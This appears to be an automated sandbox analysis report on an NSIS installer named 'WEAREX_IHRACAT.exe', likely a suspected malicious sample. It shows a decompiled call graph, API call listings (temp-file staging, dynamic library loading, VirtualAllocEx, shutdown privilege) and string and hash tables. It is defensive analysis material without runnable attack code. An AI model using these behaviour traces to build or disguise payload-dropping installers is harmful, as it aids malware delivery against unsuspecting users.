405192 25 API calls 5471->5472 5473 401498 5472->5473 5474 402293 5475 402b38 18 API calls 5474->5475 5476 4022a2 5475->5476 5477 402b38 18 API calls 5476->5477 5478 4022ab 5477->5478 5479 402b38 18 API calls 5478->5479 5480 4022b5 GetPrivateProfileStringW 5479->5480 4579 401f98 4580 40205c 4579->4580 4581 401faa 4579->4581 4584 401423 25 API calls 4580->4584 4582 402b38 18 API calls 4581->4582 4583 401fb1 4582->4583 4585 402b38 18 API calls 4583->4585 4589 402195 4584->4589 4586 401fba 4585->4586 4587 401fd0 LoadLibraryExW 4586->4587 4588 401fc2 GetModuleHandleW 4586->4588 
4587->4580 4590 401fe1 4587->4590 4588->4587 4588->4590 4602 4062be WideCharToMultiByte 4590->4602 4593 401ff2 4595 402011 4593->4595 4596 401ffa 4593->4596 4594 40202b 4597 405192 25 API calls 4594->4597 4605 10001771 4595->4605 4598 401423 25 API calls 4596->4598 4599 402002 4597->4599 4598->4599 4599->4589 4600 40204e FreeLibrary 4599->4600 4600->4589 4603 4062e8 GetProcAddress 4602->4603 4604 401fec 4602->4604 4603->4604 4604->4593 4604->4594 4606 100017a1 4605->4606 4647 10001b3e 4606->4647 4608 100017a8 4609 100018be 4608->4609 4610 100017c0 4608->4610 4611 100017b9 4608->4611 4609->4599 4681 100022eb 4610->4681 4699 100022a1 4611->4699 4616 10001824 4621 10001866 4616->4621 4622 1000182a 4616->4622 4617 10001806 4712 1000248d 4617->4712 4618 100017d6 4626 100017e7 4618->4626 4627 100017dc 4618->4627 4619 100017ef 4631 100017e5 4619->4631 4709 10002b2b 4619->4709 4624 1000248d 11 API calls 4621->4624 4629 100015cc 3 API calls 4622->4629 4632 10001858 4624->4632 4703 10002614 4626->4703 4627->4631 4693 10002870 4627->4693 4630 10001840 4629->4630 4635 1000248d 11 API calls 4630->4635 4631->4616 4631->4617 4638 100018ad 4632->4638 4736 10002450 4632->4736 4635->4632 4637 100017ed 4637->4631 4638->4609 4640 100018b7 GlobalFree 4638->4640 4640->4609 4644 10001899 4644->4638 4740 10001555 wsprintfW 4644->4740 4645 10001892 FreeLibrary 4645->4644 4743 1000121b GlobalAlloc 4647->4743 4649 10001b62 4744 1000121b GlobalAlloc 4649->4744 4651 10001b6d 4745 10001243 4651->4745 4653 10001da0 GlobalFree GlobalFree GlobalFree 4654 10001dbd 4653->4654 4668 10001e07 4653->4668 4656 1000210d 4654->4656 4662 10001dd2 4654->4662 4654->4668 4655 10001c43 GlobalAlloc 4678 10001b75 4655->4678 4657 1000212f GetModuleHandleW 4656->4657 4656->4668 4660 10002140 LoadLibraryW 4657->4660 4661 10002155 4657->4661 4658 10001c8e lstrcpyW 4663 10001c98 lstrcpyW 4658->4663 4659 10001cac GlobalFree 4659->4678 4660->4661 4660->4668 4756 10001617 WideCharToMultiByte GlobalAlloc 
WideCharToMultiByte GetProcAddress GlobalFree 4661->4756 4662->4668 4752 1000122c 4662->4752 4663->4678 4665 100021a7 4666 100021b4 lstrlenW 4665->4666 4665->4668 4757 10001617 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4666->4757 4668->4608 4669 10002167 4669->4665 4680 10002191 GetProcAddress 4669->4680 4671 10002067 4671->4668 4676 100020af lstrcpyW 4671->4676 4673 10001cea 4673->4678 4750 100015a7 GlobalSize GlobalAlloc 4673->4750 4674 10001f56 GlobalFree 4674->4678 4675 100021ce 4675->4668 4676->4668 4678->4653 4678->4655 4678->4658 4678->4659 4678->4663 4678->4668 4678->4671 4678->4673 4678->4674 4679 1000122c 2 API calls 4678->4679 4755 1000121b GlobalAlloc 4678->4755 4679->4678 4680->4665 4690 10002303 4681->4690 4682 1000122c GlobalAlloc lstrcpynW 4682->4690 4683 10001243 3 API calls 4683->4690 4685 10002419 GlobalFree 4686 100017c6 4685->4686 4685->4690 4686->4618 4686->4619 4686->4631 4687 100023d5 GlobalAlloc WideCharToMultiByte 4687->4685 4688 100023ae GlobalAlloc CLSIDFromString 4688->4685 4689 10002390 lstrlenW 4689->4685 4692 1000239b 4689->4692 4690->4682 4690->4683 4690->4685 4690->4687 4690->4688 4690->4689 4760 100012c8 4690->4760 4692->4685 4765 100025a8 4692->4765 4695 10002882 4693->4695 4694 10002927 VirtualAllocEx 4696 10002945 4694->4696 4695->4694 4697 10002a41 4696->4697 4698 10002a36 GetLastError 4696->4698 4697->4631 4698->4697 4700 100022b1 4699->4700 4701 100017bf 4699->4701 4700->4701 4702 100022c3 GlobalAlloc 4700->4702 4701->4610 4702->4700 4707 10002630 4703->4707 4704 10002681 GlobalAlloc 4708 100026a3 4704->4708 4705 10002694 4706 10002699 GlobalSize 4705->4706 4705->4708 4706->4708 4707->4704 4707->4705 4708->4637 4710 10002b36 4709->4710 4711 10002b76 GlobalFree 4710->4711 4716 100024ad 4712->4716 4714 10002540 lstrcpyW 4714->4716 4715 100024db wsprintfW 4715->4716 4716->4714 4716->4715 4717 10002561 GlobalFree 4716->4717 4718 1000250e MultiByteToWideChar 4716->4718 4719 1000258a GlobalFree 
4716->4719 4721 100024fd lstrcpynW 4716->4721 4722 10001280 2 API calls 4716->4722 4723 100024ec StringFromGUID2 4716->4723 4768 1000121b GlobalAlloc 4716->4768 4769 100012f3 4716->4769 4717->4716 4718->4716 4719->4716 4720 1000180c 4719->4720 4725 100015cc 4720->4725 4721->4716 4722->4716 4723->4716 4773 1000121b GlobalAlloc 4725->4773 4727 100015d2 4728 100015df lstrcpyW 4727->4728 4730 100015f9 4727->4730 4731 10001613 4728->4731 4730->4731 4732 100015fe wsprintfW 4730->4732 4733 10001280 4731->4733 4732->4731 4734 100012c3 GlobalFree 4733->4734 4735 10001289 GlobalAlloc lstrcpynW 4733->4735 4734->4632 4735->4734 4737 1000245e 4736->4737 4738 10001879 4736->4738 4737->4738 4739 1000247a GlobalFree 4737->4739 4738->4644 4738->4645 4739->4737 4741 10001280 2 API calls 4740->4741 4742 10001576 4741->4742 4742->4638 4743->4649 4744->4651 4746 1000127c 4745->4746 4747 1000124d 4745->4747 4746->4678 4747->4746 4758 1000121b GlobalAlloc 4747->4758 4749 10001259 lstrcpyW GlobalFree 4749->4678 4751 100015c5 4750->4751 4751->4673 4759 1000121b GlobalAlloc 4752->4759 4754 1000123b lstrcpynW 4754->4668 4755->4678 4756->4669 4757->4675 4758->4749 4759->4754 4761 100012d0 4760->4761 4762 100012ee 4760->4762 4761->4762 4763 1000122c 2 API calls 4761->4763 4762->4762 4764 100012ec 4763->4764 4764->4690 4766 100025b6 VirtualAlloc 4765->4766 4767 1000260c 4765->4767 4766->4767 4767->4692 4768->4716 4770 10001324 4769->4770 4771 100012fc 4769->4771 4770->4716 4771->4770 4772 10001308 lstrcpyW 4771->4772 4772->4770 4773->4727 5481 10001058 5482 10001243 3 API calls 5481->5482 5484 10001074 5482->5484 5483 100010dd 5484->5483 5485 1000152e 4 API calls 5484->5485 5486 10001092 5484->5486 5485->5486 5487 1000152e 4 API calls 5486->5487 5488 100010a2 5487->5488 5489 100010b2 5488->5489 5490 100010a9 GlobalSize 5488->5490 5491 100010b6 GlobalAlloc 5489->5491 5492 100010c7 5489->5492 5490->5489 5493 10001555 3 API calls 5491->5493 5494 100010d2 GlobalFree 5492->5494 5493->5492 5494->5483 
5495 401718 5496 402b38 18 API calls 5495->5496 5497 40171f SearchPathW 5496->5497 5498 40173a 5497->5498 4793 40159b 4794 402b38 18 API calls 4793->4794 4795 4015a2 SetFileAttributesW 4794->4795 4796 4015b4 4795->4796 5499 40149e 5500 40223c 5499->5500 5501 4014ac PostQuitMessage 5499->5501 5501->5500 5502 40219e 5503 402b38 18 API calls 5502->5503 5504 4021a4 5503->5504 5505 402b38 18 API calls 5504->5505 5506 4021ad 5505->5506 5507 402b38 18 API calls 5506->5507 5508 4021b6 5507->5508 5509 40622b 2 API calls 5508->5509 5510 4021bf 5509->5510 5511 4021d0 lstrlenW lstrlenW 5510->5511 5512 4021c3 5510->5512 5514 405192 25 API calls 5511->5514 5513 405192 25 API calls 5512->5513 5516 4021cb 5512->5516 5513->5516 5515 40220e SHFileOperationW 5514->5515 5515->5512 5515->5516 5517 4029a0 SendMessageW 5518 4029ba InvalidateRect 5517->5518 5519 4029c5 5517->5519 5518->5519 5527 100010e1 5528 10001111 5527->5528 5529 10001243 3 API calls 5528->5529 5539 10001121 5529->5539 5530 100011d8 GlobalFree 5531 100012c8 2 API calls 5531->5539 5532 100011d3 5532->5530 5533 10001243 3 API calls 5533->5539 5534 10001164 GlobalAlloc 5534->5539 5535 100011f8 GlobalFree 5535->5539 5536 10001280 2 API calls 5538 100011c4 GlobalFree 5536->5538 5537 100012f3 lstrcpyW 5537->5539 5538->5539 5539->5530 5539->5531 5539->5532 5539->5533 5539->5534 5539->5535 5539->5536 5539->5537 5539->5538 5540 402222 5541 402229 5540->5541 5544 40223c 5540->5544 5542 405f0a 18 API calls 5541->5542 5543 402236 5542->5543 5545 4056c4 MessageBoxIndirectW 5543->5545 5545->5544 5546 401b22 5547 401b73 5546->5547 5548 401b2f 5546->5548 5549 401b78 5547->5549 5550 401b9d GlobalAlloc 5547->5550 5551 401bb8 5548->5551 5554 401b46 5548->5554 5559 40223c 5549->5559 5567 405ee8 lstrcpynW 5549->5567 5553 405f0a 18 API calls 5550->5553 5552 405f0a 18 API calls 5551->5552 5551->5559 5555 402236 5552->5555 5553->5551 5565 405ee8 lstrcpynW 5554->5565 5561 4056c4 MessageBoxIndirectW 5555->5561 5558 401b8a GlobalFree 5558->5559 
5560 401b55 5566 405ee8 lstrcpynW 5560->5566 5561->5559 5563 401b64 5568 405ee8 lstrcpynW 5563->5568 5565->5560 5566->5563 5567->5558 5568->5559 3904 401924 3905 401926 3904->3905 3910 402b38 3905->3910 3911 402b44 3910->3911 3955 405f0a 3911->3955 3914 40192b 3916 405770 3914->3916 3994 405a3b 3916->3994 3919 405798 DeleteFileW 3921 401934 3919->3921 3920 4057af 3922 4058da 3920->3922 4008 405ee8 lstrcpynW 3920->4008 3922->3921 4038 40622b FindFirstFileW 3922->4038 3924 4057d5 3925 4057e8 3924->3925 3926 4057db lstrcatW 3924->3926 4009 40597f lstrlenW 3925->4009 3927 4057ee 3926->3927 3931 4057fe lstrcatW 3927->3931 3933 405809 lstrlenW FindFirstFileW 3927->3933 3931->3933 3932 4058f8 4041 405933 lstrlenW CharPrevW 3932->4041 3936 4058cf 3933->3936 3953 40582b 3933->3953 3936->3922 3937 4058b2 FindNextFileW 3941 4058c8 FindClose 3937->3941 3937->3953 3938 405728 5 API calls 3940 40590a 3938->3940 3942 405924 3940->3942 3943 40590e 3940->3943 3941->3936 3945 405192 25 API calls 3942->3945 3943->3921 3946 405192 25 API calls 3943->3946 3945->3921 3948 40591b 3946->3948 3947 405770 64 API calls 3947->3953 3950 405d82 40 API calls 3948->3950 3949 405192 25 API calls 3949->3937 3952 405922 3950->3952 3952->3921 3953->3937 3953->3947 3953->3949 4013 405ee8 lstrcpynW 3953->4013 4014 405728 3953->4014 4022 405192 3953->4022 4033 405d82 3953->4033 3956 405f17 3955->3956 3957 406162 3956->3957 3960 405fca GetVersion 3956->3960 3961 406130 lstrlenW 3956->3961 3964 405f0a 10 API calls 3956->3964 3966 406045 GetSystemDirectoryW 3956->3966 3967 406058 GetWindowsDirectoryW 3956->3967 3968 40617c 5 API calls 3956->3968 3969 40608c SHGetSpecialFolderLocation 3956->3969 3970 405f0a 10 API calls 3956->3970 3971 4060d1 lstrcatW 3956->3971 3982 405db5 RegOpenKeyExW 3956->3982 3987 405e2f wsprintfW 3956->3987 3988 405ee8 lstrcpynW 3956->3988 3958 402b65 3957->3958 3989 405ee8 lstrcpynW 3957->3989 3958->3914 3973 40617c 3958->3973 3960->3956 3961->3956 3964->3961 3966->3956 3967->3956 
3968->3956 3969->3956 3972 4060a4 SHGetPathFromIDListW CoTaskMemFree 3969->3972 3970->3956 3971->3956 3972->3956 3980 406189 3973->3980 3974 4061ff 3975 406204 CharPrevW 3974->3975 3977 406225 3974->3977 3975->3974 3976 4061f2 CharNextW 3976->3974 3976->3980 3977->3914 3979 4061de CharNextW 3979->3980 3980->3974 3980->3976 3980->3979 3981 4061ed CharNextW 3980->3981 3990 405960 3980->3990 3981->3976 3983 405e29 3982->3983 3984 405de9 RegQueryValueExW 3982->3984 3983->3956 3985 405e0a RegCloseKey 3984->3985 3985->3983 3987->3956 3988->3956 3989->3958 3991 405966 3990->3991 3992 40597c 3991->3992 3993 40596d CharNextW 3991->3993 3992->3980 3993->3991 4044 405ee8 lstrcpynW 3994->4044 3996 405a4c 4045 4059de CharNextW CharNextW 3996->4045 3999 405790 3999->3919 3999->3920 4000 40617c 5 API calls 4006 405a62 4000->4006 4001 405a93 lstrlenW 4002 405a9e 4001->4002 4001->4006 4004 405933 3 API calls 4002->4004 4003 40622b 2 API calls 4003->4006 4005 405aa3 GetFileAttributesW 4004->4005 4005->3999 4006->3999 4006->4001 4006->4003 4007 40597f 2 API calls 4006->4007 4007->4001 4008->3924 4010 40598d 4009->4010 4011 405993 CharPrevW 4010->4011 4012 40599f 4010->4012 4011->4010 4011->4012 4012->3927 4013->3953 4051 405b2f GetFileAttributesW 4014->4051 4017 405743 RemoveDirectoryW 4020 405751 4017->4020 4018 40574b DeleteFileW 4018->4020 4019 405755 4019->3953 4020->4019 4021 405761 SetFileAttributesW 4020->4021 4021->4019 4023 4051ad 4022->4023 4024 40524f 4022->4024 4025 4051c9 lstrlenW 4023->4025 4026 405f0a 18 API calls 4023->4026 4024->3953 4027 4051f2 4025->4027 4028 4051d7 lstrlenW 4025->4028 4026->4025 4030 405205 4027->4030 4031 4051f8 SetWindowTextW 4027->4031 4028->4024 4029 4051e9 lstrcatW 4028->4029 4029->4027 4030->4024 4032 40520b SendMessageW SendMessageW SendMessageW 4030->4032 4031->4030 4032->4024 4054 406252 GetModuleHandleA 4033->4054 4037 405daa 4037->3953 4039 406241 FindClose 4038->4039 4040 4058f4 4038->4040 4039->4040 4040->3921 4040->3932 4042 4058fe 

                          APIs
                          • #17.COMCTL32 ref: 00403377
                          • SetErrorMode.KERNELBASE(00008001), ref: 00403382
                          • OleInitialize.OLE32(00000000), ref: 00403389
                            • Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                            • Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
                            • Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280
                          • SHGetFileInfoW.SHELL32(00420690,00000000,?,000002B4,00000000), ref: 004033B1
                            • Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5
                          • GetCommandLineW.KERNEL32(004281E0,NSIS Error), ref: 004033C6
                          • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\WEAREX_IHRACAT.exe",00000000), ref: 004033D9
                          • CharNextW.USER32(00000000,"C:\Users\user\Desktop\WEAREX_IHRACAT.exe",00000020), ref: 00403400
                          • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403509
                          • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040351A
                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403526
                          • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040353A
                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403542
                          • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403553
                          • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040355B
                          • DeleteFileW.KERNELBASE(1033), ref: 0040356F
                          • OleUninitialize.OLE32(?), ref: 0040361F
                          • ExitProcess.KERNEL32 ref: 0040363F
                          • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\WEAREX_IHRACAT.exe",00000000,?), ref: 0040364B
                          • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\Desktop\WEAREX_IHRACAT.exe",00000000,?), ref: 00403657
                          • CreateDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403663
                          • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 0040366A
                          • DeleteFileW.KERNEL32(0041FE90,0041FE90,?,0042A000,?), ref: 004036C4
                          • CopyFileW.KERNEL32(C:\Users\user\Desktop\WEAREX_IHRACAT.exe,0041FE90,00000001), ref: 004036D8
                          • CloseHandle.KERNEL32(00000000,0041FE90,0041FE90,?,0041FE90,00000000), ref: 00403705
                          • GetCurrentProcess.KERNEL32(00000028,00000004,00000005,00000004,00000003), ref: 0040375B
                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00403797
                          • ExitProcess.KERNEL32 ref: 004037BA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.2454302020.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454387384.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000445000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.000000000044E000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454417897.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2454635066.0000000000453000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_WEAREX_IHRACAT.jbxd
                          Similarity
                          • API ID: File$DirectoryExitHandleProcesslstrcat$CurrentDeleteEnvironmentModulePathTempVariableWindows$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextProcUninitializelstrcmpilstrcpyn
                          • String ID: "C:\Users\user\Desktop\WEAREX_IHRACAT.exe"$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\WEAREX_IHRACAT.exe$C:\Users\user\gangningerne\jot\mtn$C:\Users\user\gangningerne\jot\mtn\Discomplexion$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$\Temp$~nsu.tmp
                          • API String ID: 4107622049-772951401
                          • Opcode ID: a3fc4b19b007463ca7c8d179c052c8cc71bf452235c419b64912ac856f47fe19
                          • Instruction ID: d10961c3cf085e12fbe59355e5df5276e8fc63a686dc482ac58f4e9f7edec25e
                          • Opcode Fuzzy Hash: a3fc4b19b007463ca7c8d179c052c8cc71bf452235c419b64912ac856f47fe19
                          • Instruction Fuzzy Hash: 8CB1E070904211AAD720BF629D49A3B3EACEB45706F40453FF542B62E2D77C5A41CB7E

                          APIs
                          • GetVersion.KERNEL32(00000000,004216B0,?,004051C9,004216B0,00000000,00000000,00000000), ref: 00405FCD
                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 0040604B
                          • GetWindowsDirectoryW.KERNEL32(Call,00000400), ref: 0040605E
                          • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 0040609A
                          • SHGetPathFromIDListW.SHELL32(?,Call), ref: 004060A8
                          • CoTaskMemFree.OLE32(?), ref: 004060B3
                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004060D7
                          • lstrlenW.KERNEL32(Call,00000000,004216B0,?,004051C9,004216B0,00000000,00000000,00000000), ref: 00406131
                          Similarity
                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                          • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                          • API String ID: 900638850-1230650788
                          • Opcode ID: 9fe4ffeb513939a43d7003ef0179ff27352b89f5fe06c0b94729ac98e3d3bc3e
                          • Instruction ID: 384f9b18ecc494a8ae61019a25258fdef34cde8ff9634092dda9820a5ebc2bca
                          • Opcode Fuzzy Hash: 9fe4ffeb513939a43d7003ef0179ff27352b89f5fe06c0b94729ac98e3d3bc3e
                          • Instruction Fuzzy Hash: 51610331A40505ABDB209F25CC44AAF37B5EF04314F51813BE956BB2E1D73D8AA2CB5E

                          APIs
                          • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,752C2EE0,"C:\Users\user\Desktop\WEAREX_IHRACAT.exe"), ref: 00405799
                          • lstrcatW.KERNEL32(004246D8,\*.*,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,752C2EE0,"C:\Users\user\Desktop\WEAREX_IHRACAT.exe"), ref: 004057E1
                          • lstrcatW.KERNEL32(?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,752C2EE0,"C:\Users\user\Desktop\WEAREX_IHRACAT.exe"), ref: 00405804
                          • lstrlenW.KERNEL32(?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,752C2EE0,"C:\Users\user\Desktop\WEAREX_IHRACAT.exe"), ref: 0040580A
                          • FindFirstFileW.KERNEL32(004246D8,?,?,?,00409014,?,004246D8,?,?,C:\Users\user\AppData\Local\Temp\,752C2EE0,"C:\Users\user\Desktop\WEAREX_IHRACAT.exe"), ref: 0040581A
                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 004058BA
                          • FindClose.KERNEL32(00000000), ref: 004058C9
                          Strings
                          • "C:\Users\user\Desktop\WEAREX_IHRACAT.exe", xrefs: 00405779
                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040577E
                          • \*.*, xrefs: 004057DB
                          Similarity
                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                          • String ID: "C:\Users\user\Desktop\WEAREX_IHRACAT.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                          • API String ID: 2035342205-1219310517
                          • Opcode ID: 8c3b492f51f2aa56c01f6892731e0635e14f6b509c2227e8f90ab5b8896d8952
                          • Instruction ID: ac1757c2d801c66fd25662a47f0a2b95df28272739e9ed83f1af15967125822e
                          • Opcode Fuzzy Hash: 8c3b492f51f2aa56c01f6892731e0635e14f6b509c2227e8f90ab5b8896d8952
                          • Instruction Fuzzy Hash: D541B132800A14F6DB217B659C49AAF76B8DF41724F20817BF801B21D1D77C4D92DE6E
                          APIs
                          • FindFirstFileW.KERNELBASE(?,00425720,00424ED8,00405A84,00424ED8,00424ED8,00000000,00424ED8,00424ED8,?,?,752C2EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,752C2EE0), ref: 00406236
                          • FindClose.KERNELBASE(00000000), ref: 00406242
                          Similarity
                          • API ID: Find$CloseFileFirst
                          • String ID: WB
                          • API String ID: 2295610775-2854515933
                          • Opcode ID: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                          • Instruction ID: 5d149797fe7980082160aacd61be100e78ee611d6da8cc620cf98d5f9d27cd73
                          • Opcode Fuzzy Hash: 97d8ac7551d2396f11c19c7edcb60b5d9a64dc0e7ee5904d5f336116d8bf08e8
                          • Instruction Fuzzy Hash: 34D01231A590209BC20037387D0C85B7A58AB493307624AB6F826F23E0C7389C6586AD
                          APIs
                          • GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                          • LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
                          • GetProcAddress.KERNEL32(00000000,?), ref: 00406280
                          Similarity
                          • API ID: AddressHandleLibraryLoadModuleProc
                          • String ID:
                          • API String ID: 310444273-0
                          • Opcode ID: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                          • Instruction ID: 168f21105135a374c063cbb502f6419b25eb399c8ec2d40735489a78174e37d1
                          • Opcode Fuzzy Hash: fea95c0a25b0bbf4266b289da7fdc3055b6cbcb5f703618f179729d09c13f2c5
                          • Instruction Fuzzy Hash: 6FE0CD36E08120BBC7115B309D44D6773BC9FD9741305043DF505F6240C774AC1297E9
                          APIs
                          • FindFirstFileW.KERNELBASE(00000000,?,00000002), ref: 0040277D
                          Similarity
                          • API ID: FileFindFirst
                          • String ID:
                          • API String ID: 1974802433-0

                          APIs
                            • Part of subcall function 00406252: GetModuleHandleA.KERNEL32(?,?,00000020,0040339B,00000008), ref: 00406264
                            • Part of subcall function 00406252: LoadLibraryA.KERNELBASE(?,?,00000020,0040339B,00000008), ref: 0040626F
                            • Part of subcall function 00406252: GetProcAddress.KERNEL32(00000000,?), ref: 00406280
                          • lstrcatW.KERNEL32(1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\,752C3420,00000000,"C:\Users\user\Desktop\WEAREX_IHRACAT.exe"), ref: 00403933
                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\gangningerne\jot\mtn,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000,00000006,C:\Users\user\AppData\Local\Temp\), ref: 004039B3
                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\gangningerne\jot\mtn,1033,004226D0,80000001,Control Panel\Desktop\ResourceLocale,00000000,004226D0,00000000), ref: 004039C6
                          • GetFileAttributesW.KERNEL32(Call), ref: 004039D1
                          • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\gangningerne\jot\mtn), ref: 00403A1A
                            • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                          • RegisterClassW.USER32(00428180), ref: 00403A57
                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403A6F
                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AA4
                          • ShowWindow.USER32(00000005,00000000), ref: 00403ADA
                          • LoadLibraryW.KERNEL32(RichEd20), ref: 00403AEB
                          • LoadLibraryW.KERNEL32(RichEd32), ref: 00403AF6
                          • GetClassInfoW.USER32(00000000,RichEdit20W,00428180), ref: 00403B06
                          • GetClassInfoW.USER32(00000000,RichEdit,00428180), ref: 00403B13
                          • RegisterClassW.USER32(00428180), ref: 00403B1C
                          • DialogBoxParamW.USER32(?,00000000,00403C55,00000000), ref: 00403B3B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Similarity
                          • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                          • String ID: "C:\Users\user\Desktop\WEAREX_IHRACAT.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\gangningerne\jot\mtn$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                          • API String ID: 914957316-2933927330

                          APIs
                          • GetTickCount.KERNEL32 ref: 00402DCE
                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\WEAREX_IHRACAT.exe,00000400), ref: 00402DEA
                            • Part of subcall function 00405B54: GetFileAttributesW.KERNELBASE(00000003,00402DFD,C:\Users\user\Desktop\WEAREX_IHRACAT.exe,80000000,00000003), ref: 00405B58
                            • Part of subcall function 00405B54: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405B7A
                          • GetFileSize.KERNEL32(00000000,00000000,00438000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\WEAREX_IHRACAT.exe,C:\Users\user\Desktop\WEAREX_IHRACAT.exe,80000000,00000003), ref: 00402E33
                          • GlobalAlloc.KERNELBASE(00000040,00409230), ref: 00402F7A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2454331246.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          Similarity
                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                          • String ID: "C:\Users\user\Desktop\WEAREX_IHRACAT.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\WEAREX_IHRACAT.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                          • API String ID: 2803837635-745245828

                          APIs
                          • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\gangningerne\jot\mtn\Discomplexion,?,?,00000031), ref: 00401793
                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\gangningerne\jot\mtn\Discomplexion,?,?,00000031), ref: 004017B8
